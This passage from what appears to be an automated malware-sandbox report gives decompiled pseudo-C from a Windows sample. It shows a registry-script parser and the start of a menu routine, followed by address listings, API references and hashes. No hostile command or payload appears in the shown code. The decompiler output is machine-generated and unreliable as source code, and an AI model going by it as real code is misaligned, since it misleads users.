                                                                                                                                                                                                                                                                                          												_t96 = CharNextA(_t120);
                                                                                                                                                                                                                                                                                          												 *_t102 = _t96;
                                                                                                                                                                                                                                                                                          												_t97 = CharNextA(_t96);
                                                                                                                                                                                                                                                                                          												 *_t102 = _t97;
                                                                                                                                                                                                                                                                                          												_t98 = CharNextA(_t97);
                                                                                                                                                                                                                                                                                          												 *_t102 = _t98;
                                                                                                                                                                                                                                                                                          												 *_t102 = CharNextA(_t98);
                                                                                                                                                                                                                                                                                          												if(E000F1DF0( &_v84, _t123,  &_v84, L"HKCU\r\n{\tSoftware\r\n\t{\r\n\t\tClasses") == 0) {
                                                                                                                                                                                                                                                                                          													L40:
                                                                                                                                                                                                                                                                                          													_v60 = 0x8007000e;
                                                                                                                                                                                                                                                                                          													__imp__CoTaskMemFree(_v76);
                                                                                                                                                                                                                                                                                          													_t65 = _v60;
                                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                                          													_v54 = 1;
                                                                                                                                                                                                                                                                                          													L20:
                                                                                                                                                                                                                                                                                          													_t85 =  *_t102;
                                                                                                                                                                                                                                                                                          													if( *_t85 != 0x27) {
                                                                                                                                                                                                                                                                                          														L27:
                                                                                                                                                                                                                                                                                          														if(_v53 != 0) {
                                                                                                                                                                                                                                                                                          															goto L36;
                                                                                                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                                                                                                          															goto L28;
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                                          														if(_v53 != 0) {
                                                                                                                                                                                                                                                                                          															if( *(CharNextA(_t85)) == 0x27) {
                                                                                                                                                                                                                                                                                          																_t123 =  *_t102;
                                                                                                                                                                                                                                                                                          																_t130 = CharNextA( *_t102);
                                                                                                                                                                                                                                                                                          																 *_t102 = _t130;
                                                                                                                                                                                                                                                                                          																if(E000F1D60(CharNextA(_t130) - _t130,  &_v84, _t130) == 0) {
                                                                                                                                                                                                                                                                                          																	goto L40;
                                                                                                                                                                                                                                                                                          																} else {
                                                                                                                                                                                                                                                                                          																	goto L27;
                                                                                                                                                                                                                                                                                          																}
                                                                                                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                                                                                                          																_v53 = 0;
                                                                                                                                                                                                                                                                                          																L28:
                                                                                                                                                                                                                                                                                          																_t87 =  *( *_t102);
                                                                                                                                                                                                                                                                                          																if(_t87 == 0x7b) {
                                                                                                                                                                                                                                                                                          																	_v72 = _v72 + 1;
                                                                                                                                                                                                                                                                                          																}
                                                                                                                                                                                                                                                                                          																if(_t87 != 0x7d) {
                                                                                                                                                                                                                                                                                          																	goto L36;
                                                                                                                                                                                                                                                                                          																} else {
                                                                                                                                                                                                                                                                                          																	_t26 =  &_v72;
                                                                                                                                                                                                                                                                                          																	 *_t26 = _v72 - 1;
                                                                                                                                                                                                                                                                                          																	if( *_t26 != 0 || _v54 != 1) {
                                                                                                                                                                                                                                                                                          																		goto L36;
                                                                                                                                                                                                                                                                                          																	} else {
                                                                                                                                                                                                                                                                                          																		if(E000F1DF0( &_v84, _t123,  &_v84, L"\r\n\t}\r\n}\r\n") == 0) {
                                                                                                                                                                                                                                                                                          																			goto L40;
                                                                                                                                                                                                                                                                                          																		} else {
                                                                                                                                                                                                                                                                                          																			_v54 = 0;
                                                                                                                                                                                                                                                                                          																			goto L36;
                                                                                                                                                                                                                                                                                          																		}
                                                                                                                                                                                                                                                                                          																	}
                                                                                                                                                                                                                                                                                          																}
                                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                                                                                                          															_v53 = 1;
                                                                                                                                                                                                                                                                                          															L36:
                                                                                                                                                                                                                                                                                          															_t128 =  *_t102;
                                                                                                                                                                                                                                                                                          															_push(_t128);
                                                                                                                                                                                                                                                                                          															if( *_t128 != 0x25) {
                                                                                                                                                                                                                                                                                          																L39:
                                                                                                                                                                                                                                                                                          																if(E000F1D60(CharNextA() - _t128,  &_v84, _t128) != 0) {
                                                                                                                                                                                                                                                                                          																	goto L50;
                                                                                                                                                                                                                                                                                          																} else {
                                                                                                                                                                                                                                                                                          																	goto L40;
                                                                                                                                                                                                                                                                                          																}
                                                                                                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                                                                                                          																_t128 = CharNextA();
                                                                                                                                                                                                                                                                                          																 *_t102 = _t128;
                                                                                                                                                                                                                                                                                          																if( *_t128 != 0x25) {
                                                                                                                                                                                                                                                                                          																	_t77 = E000F2B60(_t128, 0x25);
                                                                                                                                                                                                                                                                                          																	_v92 = _t77;
                                                                                                                                                                                                                                                                                          																	if(_t77 == 0) {
                                                                                                                                                                                                                                                                                          																		L53:
                                                                                                                                                                                                                                                                                          																		_v60 = 0x80020009;
                                                                                                                                                                                                                                                                                          																		__imp__CoTaskMemFree(_v76);
                                                                                                                                                                                                                                                                                          																		_t65 = _v60;
                                                                                                                                                                                                                                                                                          																	} else {
                                                                                                                                                                                                                                                                                          																		_t140 = _v68;
                                                                                                                                                                                                                                                                                          																		_t115 =  *_t140;
                                                                                                                                                                                                                                                                                          																		_t78 = _t77 -  *_t140;
                                                                                                                                                                                                                                                                                          																		if(_t77 -  *_t140 > 0x1f) {
                                                                                                                                                                                                                                                                                          																			_v60 = 0x80004005;
                                                                                                                                                                                                                                                                                          																			__imp__CoTaskMemFree(_v76);
                                                                                                                                                                                                                                                                                          																			_t65 = _v60;
                                                                                                                                                                                                                                                                                          																		} else {
                                                                                                                                                                                                                                                                                          																			_t123 = 0x20;
                                                                                                                                                                                                                                                                                          																			E000F1300(_t78, _t115, 0x20,  &_v52);
                                                                                                                                                                                                                                                                                          																			_t141 =  *((intOrPtr*)(_t140 + 4));
                                                                                                                                                                                                                                                                                          																			_t149 = _t149 + 4;
                                                                                                                                                                                                                                                                                          																			_t105 =  *((intOrPtr*)(_t140 + 4)) + 0x10;
                                                                                                                                                                                                                                                                                          																			_v96 =  &_v52;
                                                                                                                                                                                                                                                                                          																			EnterCriticalSection(_t105);
                                                                                                                                                                                                                                                                                          																			_t81 = E000FA380( *((intOrPtr*)(_t140 + 4)) + 4, _t141,  &_v96);
                                                                                                                                                                                                                                                                                          																			_t142 = _t81;
                                                                                                                                                                                                                                                                                          																			LeaveCriticalSection(_t105);
                                                                                                                                                                                                                                                                                          																			if(_t81 == 0) {
                                                                                                                                                                                                                                                                                          																				goto L53;
                                                                                                                                                                                                                                                                                          																			} else {
                                                                                                                                                                                                                                                                                          																				_t123 =  &_v84;
                                                                                                                                                                                                                                                                                          																				if(E000F1DF0( &_v96,  &_v84,  &_v84, _t142) == 0) {
                                                                                                                                                                                                                                                                                          																					goto L40;
                                                                                                                                                                                                                                                                                          																				} else {
                                                                                                                                                                                                                                                                                          																					_t133 = _v92;
                                                                                                                                                                                                                                                                                          																					_t83 = _v68;
                                                                                                                                                                                                                                                                                          																					if( *_t83 == _t133) {
                                                                                                                                                                                                                                                                                          																						_t102 = _t83;
                                                                                                                                                                                                                                                                                          																					} else {
                                                                                                                                                                                                                                                                                          																						do {
                                                                                                                                                                                                                                                                                          																							_t146 = _v68;
                                                                                                                                                                                                                                                                                          																							_t84 = CharNextA( *_t146);
                                                                                                                                                                                                                                                                                          																							 *_t146 = _t84;
                                                                                                                                                                                                                                                                                          																						} while (_t84 != _t133);
                                                                                                                                                                                                                                                                                          																						_t102 = _t146;
                                                                                                                                                                                                                                                                                          																					}
                                                                                                                                                                                                                                                                                          																					goto L50;
                                                                                                                                                                                                                                                                                          																				}
                                                                                                                                                                                                                                                                                          																			}
                                                                                                                                                                                                                                                                                          																		}
                                                                                                                                                                                                                                                                                          																	}
                                                                                                                                                                                                                                                                                          																} else {
                                                                                                                                                                                                                                                                                          																	_push(_t128);
                                                                                                                                                                                                                                                                                          																	goto L39;
                                                                                                                                                                                                                                                                                          																}
                                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								goto L56;
                                                                                                                                                                                                                                                                                          								L50:
                                                                                                                                                                                                                                                                                          								_t123 =  *_t102;
                                                                                                                                                                                                                                                                                          								_t74 = CharNextA( *_t102);
                                                                                                                                                                                                                                                                                          								 *_t102 = _t74;
                                                                                                                                                                                                                                                                                          							} while ( *_t74 != 0);
                                                                                                                                                                                                                                                                                          							_t126 = _v88;
                                                                                                                                                                                                                                                                                          							goto L52;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						__imp__CoTaskMemFree(0);
                                                                                                                                                                                                                                                                                          						_t65 = 0x8007000e;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L56:
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          				_pop(_t127);
                                                                                                                                                                                                                                                                                          				_pop(_t136);
                                                                                                                                                                                                                                                                                          				_pop(_t103);
                                                                                                                                                                                                                                                                                          				return E001059E6(_t65, _t103, _v20 ^ _t147, _t123, _t127, _t136);
                                                                                                                                                                                                                                                                                          			}























































                                                                                                                                                                                                                                                                                          0x000f3340
                                                                                                                                                                                                                                                                                          0x000f3343
                                                                                                                                                                                                                                                                                          0x000f3345
                                                                                                                                                                                                                                                                                          0x000f3350
                                                                                                                                                                                                                                                                                          0x000f3351
                                                                                                                                                                                                                                                                                          0x000f3354
                                                                                                                                                                                                                                                                                          0x000f3359
                                                                                                                                                                                                                                                                                          0x000f335b
                                                                                                                                                                                                                                                                                          0x000f3361
                                                                                                                                                                                                                                                                                          0x000f3365
                                                                                                                                                                                                                                                                                          0x000f336b
                                                                                                                                                                                                                                                                                          0x000f336e
                                                                                                                                                                                                                                                                                          0x000f3370
                                                                                                                                                                                                                                                                                          0x000f3372
                                                                                                                                                                                                                                                                                          0x000f3375
                                                                                                                                                                                                                                                                                          0x000f337a
                                                                                                                                                                                                                                                                                          0x000f3626
                                                                                                                                                                                                                                                                                          0x000f3388
                                                                                                                                                                                                                                                                                          0x000f3389
                                                                                                                                                                                                                                                                                          0x000f3395
                                                                                                                                                                                                                                                                                          0x000f339a
                                                                                                                                                                                                                                                                                          0x000f339c
                                                                                                                                                                                                                                                                                          0x000f339c
                                                                                                                                                                                                                                                                                          0x000f33a3
                                                                                                                                                                                                                                                                                          0x000f33a6
                                                                                                                                                                                                                                                                                          0x000f33ab
                                                                                                                                                                                                                                                                                          0x000f33b2
                                                                                                                                                                                                                                                                                          0x000f33b6
                                                                                                                                                                                                                                                                                          0x000f33b7
                                                                                                                                                                                                                                                                                          0x000f33b7
                                                                                                                                                                                                                                                                                          0x000f33bf
                                                                                                                                                                                                                                                                                          0x000f33c4
                                                                                                                                                                                                                                                                                          0x000f33c6
                                                                                                                                                                                                                                                                                          0x000f33c6
                                                                                                                                                                                                                                                                                          0x000f33c8
                                                                                                                                                                                                                                                                                          0x000f33cd
                                                                                                                                                                                                                                                                                          0x000f33e0
                                                                                                                                                                                                                                                                                          0x000f33e5
                                                                                                                                                                                                                                                                                          0x000f33ea
                                                                                                                                                                                                                                                                                          0x000f33ed
                                                                                                                                                                                                                                                                                          0x000f33f0
                                                                                                                                                                                                                                                                                          0x000f33f3
                                                                                                                                                                                                                                                                                          0x000f33f7
                                                                                                                                                                                                                                                                                          0x000f33fb
                                                                                                                                                                                                                                                                                          0x000f35df
                                                                                                                                                                                                                                                                                          0x000f35e2
                                                                                                                                                                                                                                                                                          0x000f35ed
                                                                                                                                                                                                                                                                                          0x000f35ef
                                                                                                                                                                                                                                                                                          0x000f35f5
                                                                                                                                                                                                                                                                                          0x000f3401
                                                                                                                                                                                                                                                                                          0x000f3401
                                                                                                                                                                                                                                                                                          0x000f3405
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f340b
                                                                                                                                                                                                                                                                                          0x000f340f
                                                                                                                                                                                                                                                                                          0x000f3461
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f3411
                                                                                                                                                                                                                                                                                          0x000f3419
                                                                                                                                                                                                                                                                                          0x000f341e
                                                                                                                                                                                                                                                                                          0x000f3423
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f3425
                                                                                                                                                                                                                                                                                          0x000f3425
                                                                                                                                                                                                                                                                                          0x000f3429
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f342b
                                                                                                                                                                                                                                                                                          0x000f3432
                                                                                                                                                                                                                                                                                          0x000f3435
                                                                                                                                                                                                                                                                                          0x000f3437
                                                                                                                                                                                                                                                                                          0x000f343a
                                                                                                                                                                                                                                                                                          0x000f343c
                                                                                                                                                                                                                                                                                          0x000f343f
                                                                                                                                                                                                                                                                                          0x000f344c
                                                                                                                                                                                                                                                                                          0x000f3455
                                                                                                                                                                                                                                                                                          0x000f3514
                                                                                                                                                                                                                                                                                          0x000f3518
                                                                                                                                                                                                                                                                                          0x000f351f
                                                                                                                                                                                                                                                                                          0x000f3525
                                                                                                                                                                                                                                                                                          0x000f345b
                                                                                                                                                                                                                                                                                          0x000f345b
                                                                                                                                                                                                                                                                                          0x000f3467
                                                                                                                                                                                                                                                                                          0x000f3467
                                                                                                                                                                                                                                                                                          0x000f346c
                                                                                                                                                                                                                                                                                          0x000f34ab
                                                                                                                                                                                                                                                                                          0x000f34af
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f346e
                                                                                                                                                                                                                                                                                          0x000f3472
                                                                                                                                                                                                                                                                                          0x000f3480
                                                                                                                                                                                                                                                                                          0x000f3488
                                                                                                                                                                                                                                                                                          0x000f348d
                                                                                                                                                                                                                                                                                          0x000f3490
                                                                                                                                                                                                                                                                                          0x000f34a3
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f34a5
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f34a5
                                                                                                                                                                                                                                                                                          0x000f3482
                                                                                                                                                                                                                                                                                          0x000f3482
                                                                                                                                                                                                                                                                                          0x000f34b1
                                                                                                                                                                                                                                                                                          0x000f34b3
                                                                                                                                                                                                                                                                                          0x000f34b7
                                                                                                                                                                                                                                                                                          0x000f34b9
                                                                                                                                                                                                                                                                                          0x000f34b9
                                                                                                                                                                                                                                                                                          0x000f34be
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f34c0
                                                                                                                                                                                                                                                                                          0x000f34c0
                                                                                                                                                                                                                                                                                          0x000f34c0
                                                                                                                                                                                                                                                                                          0x000f34c3
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f34cb
                                                                                                                                                                                                                                                                                          0x000f34db
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f34dd
                                                                                                                                                                                                                                                                                          0x000f34dd
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f34dd
                                                                                                                                                                                                                                                                                          0x000f34db
                                                                                                                                                                                                                                                                                          0x000f34c3
                                                                                                                                                                                                                                                                                          0x000f34be
                                                                                                                                                                                                                                                                                          0x000f3474
                                                                                                                                                                                                                                                                                          0x000f3474
                                                                                                                                                                                                                                                                                          0x000f34e9
                                                                                                                                                                                                                                                                                          0x000f34e9
                                                                                                                                                                                                                                                                                          0x000f34ee
                                                                                                                                                                                                                                                                                          0x000f34ef
                                                                                                                                                                                                                                                                                          0x000f34fd
                                                                                                                                                                                                                                                                                          0x000f350e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f34f1
                                                                                                                                                                                                                                                                                          0x000f34f3
                                                                                                                                                                                                                                                                                          0x000f34f5
                                                                                                                                                                                                                                                                                          0x000f34fa
                                                                                                                                                                                                                                                                                          0x000f3531
                                                                                                                                                                                                                                                                                          0x000f3536
                                                                                                                                                                                                                                                                                          0x000f353b
                                                                                                                                                                                                                                                                                          0x000f35fa
                                                                                                                                                                                                                                                                                          0x000f35fe
                                                                                                                                                                                                                                                                                          0x000f3605
                                                                                                                                                                                                                                                                                          0x000f360b
                                                                                                                                                                                                                                                                                          0x000f3541
                                                                                                                                                                                                                                                                                          0x000f3541
                                                                                                                                                                                                                                                                                          0x000f3544
                                                                                                                                                                                                                                                                                          0x000f3546
                                                                                                                                                                                                                                                                                          0x000f354b
                                                                                                                                                                                                                                                                                          0x000f3614
                                                                                                                                                                                                                                                                                          0x000f361b
                                                                                                                                                                                                                                                                                          0x000f3621
                                                                                                                                                                                                                                                                                          0x000f3551
                                                                                                                                                                                                                                                                                          0x000f3555
                                                                                                                                                                                                                                                                                          0x000f355a
                                                                                                                                                                                                                                                                                          0x000f355f
                                                                                                                                                                                                                                                                                          0x000f3562
                                                                                                                                                                                                                                                                                          0x000f3568
                                                                                                                                                                                                                                                                                          0x000f356c
                                                                                                                                                                                                                                                                                          0x000f356f
                                                                                                                                                                                                                                                                                          0x000f357c
                                                                                                                                                                                                                                                                                          0x000f3582
                                                                                                                                                                                                                                                                                          0x000f3584
                                                                                                                                                                                                                                                                                          0x000f358c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f358e
                                                                                                                                                                                                                                                                                          0x000f358f
                                                                                                                                                                                                                                                                                          0x000f359a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f35a0
                                                                                                                                                                                                                                                                                          0x000f35a0
                                                                                                                                                                                                                                                                                          0x000f35a3
                                                                                                                                                                                                                                                                                          0x000f35a8
                                                                                                                                                                                                                                                                                          0x000f35c6
                                                                                                                                                                                                                                                                                          0x000f35b0
                                                                                                                                                                                                                                                                                          0x000f35b0
                                                                                                                                                                                                                                                                                          0x000f35b0
                                                                                                                                                                                                                                                                                          0x000f35b6
                                                                                                                                                                                                                                                                                          0x000f35bc
                                                                                                                                                                                                                                                                                          0x000f35be
                                                                                                                                                                                                                                                                                          0x000f35c2
                                                                                                                                                                                                                                                                                          0x000f35c2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f35a8
                                                                                                                                                                                                                                                                                          0x000f359a
                                                                                                                                                                                                                                                                                          0x000f358c
                                                                                                                                                                                                                                                                                          0x000f354b
                                                                                                                                                                                                                                                                                          0x000f34fc
                                                                                                                                                                                                                                                                                          0x000f34fc
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f34fc
                                                                                                                                                                                                                                                                                          0x000f34fa
                                                                                                                                                                                                                                                                                          0x000f34ef
                                                                                                                                                                                                                                                                                          0x000f3472
                                                                                                                                                                                                                                                                                          0x000f346c
                                                                                                                                                                                                                                                                                          0x000f3455
                                                                                                                                                                                                                                                                                          0x000f3429
                                                                                                                                                                                                                                                                                          0x000f3423
                                                                                                                                                                                                                                                                                          0x000f340f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f35c8
                                                                                                                                                                                                                                                                                          0x000f35c8
                                                                                                                                                                                                                                                                                          0x000f35cb
                                                                                                                                                                                                                                                                                          0x000f35d1
                                                                                                                                                                                                                                                                                          0x000f35d3
                                                                                                                                                                                                                                                                                          0x000f35dc
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f35dc
                                                                                                                                                                                                                                                                                          0x000f33cf
                                                                                                                                                                                                                                                                                          0x000f33d0
                                                                                                                                                                                                                                                                                          0x000f33d6
                                                                                                                                                                                                                                                                                          0x000f33d6
                                                                                                                                                                                                                                                                                          0x000f33cd
                                                                                                                                                                                                                                                                                          0x000f362b
                                                                                                                                                                                                                                                                                          0x000f362e
                                                                                                                                                                                                                                                                                          0x000f3636
                                                                                                                                                                                                                                                                                          0x000f3637
                                                                                                                                                                                                                                                                                          0x000f3638
                                                                                                                                                                                                                                                                                          0x000f3646

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,1F9A9BDF,?,00000000,00000000), ref: 000F338F
                                                                                                                                                                                                                                                                                          • CoTaskMemAlloc.OLE32(00000000,?,1F9A9BDF,?,00000000,00000000), ref: 000F33B7
                                                                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000,?,1F9A9BDF,?,00000000,00000000), ref: 000F33D0
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(?,00000000,00000000), ref: 000F3432
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(00000000,?,00000000,00000000), ref: 000F3437
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(00000000,?,00000000,00000000), ref: 000F343C
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(00000000,?,00000000,00000000), ref: 000F3441
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F1DF0: lstrlenW.KERNEL32(?,1F9A9BDF,?,00000000,?,000000FF,?,000F3598,?,00000000), ref: 000F1E2F
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F1DF0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,00000000,00000001,00000000,00000000,?,000F3598,?,00000000), ref: 000F1E9C
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(BC000000,?,1F9A9BDF,?,00000000,00000000), ref: 000F347B
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(?,?,1F9A9BDF,?,00000000,00000000), ref: 000F348B
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(00000000,?,?,1F9A9BDF,?,00000000,00000000), ref: 000F3492
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(000F2437,?,1F9A9BDF,?,00000000,00000000), ref: 000F34F1
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(000F2437,?,1F9A9BDF,?,00000000,00000000), ref: 000F34FD
                                                                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(?,000F2437,?,1F9A9BDF,?,00000000,00000000), ref: 000F351F
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000), ref: 000F356F
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?), ref: 000F3584
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(?,?,00000000), ref: 000F35B6
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(?,000F2437,?,1F9A9BDF,?,00000000,00000000), ref: 000F35CB
                                                                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000,?,1F9A9BDF,?,00000000,00000000), ref: 000F35EF
                                                                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(?,?,1F9A9BDF,?,00000000,00000000), ref: 000F3605
                                                                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(?,?,1F9A9BDF,?,00000000,00000000), ref: 000F361B
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Char$Next$Task$Free$CriticalSectionlstrlen$AllocByteEnterLeaveMultiWide
                                                                                                                                                                                                                                                                                          • String ID: }}$HKCR$HKCU{Software{Classes
                                                                                                                                                                                                                                                                                          • API String ID: 3389487283-1142484189
                                                                                                                                                                                                                                                                                          • Opcode ID: 76598f1100bf9716df8284b765f684167f7ef3b6d3c16b2b1f7c837ff5f0e28c
                                                                                                                                                                                                                                                                                          • Instruction ID: d9b63e9c8f021be34e3eb7920bed269b53afbaa230c98dc2367d7428508fbe1c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76598f1100bf9716df8284b765f684167f7ef3b6d3c16b2b1f7c837ff5f0e28c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40A1AD71D0425CEFDB26DFA4D8847AEBBF4AF49320F144119EA01EBA40D774AA85DB60
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 97%
                                                                                                                                                                                                                                                                                          			E000FE8C0(void* __ecx, struct HMENU__* __edx, signed char _a4, int _a8) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				char _v116;
                                                                                                                                                                                                                                                                                          				intOrPtr _v120;
                                                                                                                                                                                                                                                                                          				intOrPtr _v124;
                                                                                                                                                                                                                                                                                          				intOrPtr _v128;
                                                                                                                                                                                                                                                                                          				void* _v132;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v148;
                                                                                                                                                                                                                                                                                          				intOrPtr _v152;
                                                                                                                                                                                                                                                                                          				intOrPtr _v156;
                                                                                                                                                                                                                                                                                          				signed char _v160;
                                                                                                                                                                                                                                                                                          				intOrPtr _v164;
                                                                                                                                                                                                                                                                                          				void* _v168;
                                                                                                                                                                                                                                                                                          				struct _OSVERSIONINFOA _v324;
                                                                                                                                                                                                                                                                                          				char _v325;
                                                                                                                                                                                                                                                                                          				void* _v332;
                                                                                                                                                                                                                                                                                          				long _v336;
                                                                                                                                                                                                                                                                                          				signed int _v340;
                                                                                                                                                                                                                                                                                          				int _v344;
                                                                                                                                                                                                                                                                                          				int _v348;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _v352;
                                                                                                                                                                                                                                                                                          				CHAR* _v356;
                                                                                                                                                                                                                                                                                          				struct tagMENUITEMINFOA _v404;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t92;
                                                                                                                                                                                                                                                                                          				signed char _t95;
                                                                                                                                                                                                                                                                                          				long _t97;
                                                                                                                                                                                                                                                                                          				signed char _t110;
                                                                                                                                                                                                                                                                                          				signed char _t112;
                                                                                                                                                                                                                                                                                          				int _t125;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t139;
                                                                                                                                                                                                                                                                                          				CHAR* _t140;
                                                                                                                                                                                                                                                                                          				char _t144;
                                                                                                                                                                                                                                                                                          				int _t145;
                                                                                                                                                                                                                                                                                          				int _t147;
                                                                                                                                                                                                                                                                                          				char _t159;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t167;
                                                                                                                                                                                                                                                                                          				void* _t169;
                                                                                                                                                                                                                                                                                          				signed short _t170;
                                                                                                                                                                                                                                                                                          				void* _t172;
                                                                                                                                                                                                                                                                                          				signed int _t173;
                                                                                                                                                                                                                                                                                          				void* _t174;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t92 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t92 ^ _t173;
                                                                                                                                                                                                                                                                                          				_t145 = _a8;
                                                                                                                                                                                                                                                                                          				_t172 = __ecx;
                                                                                                                                                                                                                                                                                          				_t147 = _a4;
                                                                                                                                                                                                                                                                                          				 *_t145 = 1;
                                                                                                                                                                                                                                                                                          				_t95 =  *(__ecx + 0x84) & 0x00000001;
                                                                                                                                                                                                                                                                                          				_t167 = __edx;
                                                                                                                                                                                                                                                                                          				_v352 = __edx;
                                                                                                                                                                                                                                                                                          				_v348 = _t145;
                                                                                                                                                                                                                                                                                          				if(_t95 == 0) {
                                                                                                                                                                                                                                                                                          					L2:
                                                                                                                                                                                                                                                                                          					_v336 = 0x10001;
                                                                                                                                                                                                                                                                                          					L3:
                                                                                                                                                                                                                                                                                          					if(_t95 == 0) {
                                                                                                                                                                                                                                                                                          						L34:
                                                                                                                                                                                                                                                                                          						_t162 =  *(_t172 + 4);
                                                                                                                                                                                                                                                                                          						_v332 = 0;
                                                                                                                                                                                                                                                                                          						_t97 = SendMessageA( *(_t172 + 4), 0x44e, _t147,  &_v332);
                                                                                                                                                                                                                                                                                          						if(_t97 != 0) {
